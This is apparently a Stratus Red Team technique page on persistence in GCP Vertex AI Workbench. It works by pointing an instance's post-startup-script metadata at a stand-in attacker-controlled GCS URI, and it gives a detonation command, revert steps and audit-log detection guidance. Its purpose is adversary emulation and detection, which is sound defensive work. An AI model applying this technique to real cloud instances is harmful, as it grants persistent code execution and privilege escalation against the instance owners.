Inject a Malicious Startup Script into a Vertex AI Workbench Instance

slow

Platform: GCP

Mappings

• MITRE ATT&CK
  • Execution
• Privilege Escalation

Description

Modifies a Vertex AI Workbench (user-managed notebook) instance to execute a remote script on the next start by injecting a malicious URL into the instance's post-startup-script metadata field. An attacker with notebooks.instances.update permission can use this technique to achieve persistent code execution inside the notebook environment, run under the instance's service account identity.

Warm-up:

• Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a)

Note: This technique requires the Notebooks API (notebooks.googleapis.com) to be enabled in your GCP project. If it is not enabled, the warm-up will fail with a 403 error pointing to the API enablement page.

Detonation:

• Patch the Workbench instance's GCE setup metadata to set post-startup-script to a fictitious attacker-controlled GCS URI (gs://evil-attacker-<project-id>-<random>/malicious.sh)

Revert:

• Remove the post-startup-script metadata key from the instance

References:

• https://cloud.google.com/vertex-ai/docs/workbench/user-managed/manage-notebooks-introduction
• https://cloud.google.com/vertex-ai/docs/workbench/reference/rest/v2/projects.locations.instances/patch
• https://sra.io/blog/privilege-escalation-in-aws-and-gcp-machine-learning-instances/
• https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-vertex-ai/

Instructions

Detonate with Stratus Red Team

stratus detonate gcp.execution.modify-vertex-notebook-startup

Detection

Identify when a Vertex AI Workbench instance's metadata is modified by monitoring for google.cloud.notebooks.v2.NotebookService.UpdateInstance events in GCP Admin Activity audit logs. Alert when the post-startup-script or startup-script metadata fields are added or changed to external URLs, which may indicate an attempt to establish persistent code execution in the notebook environment.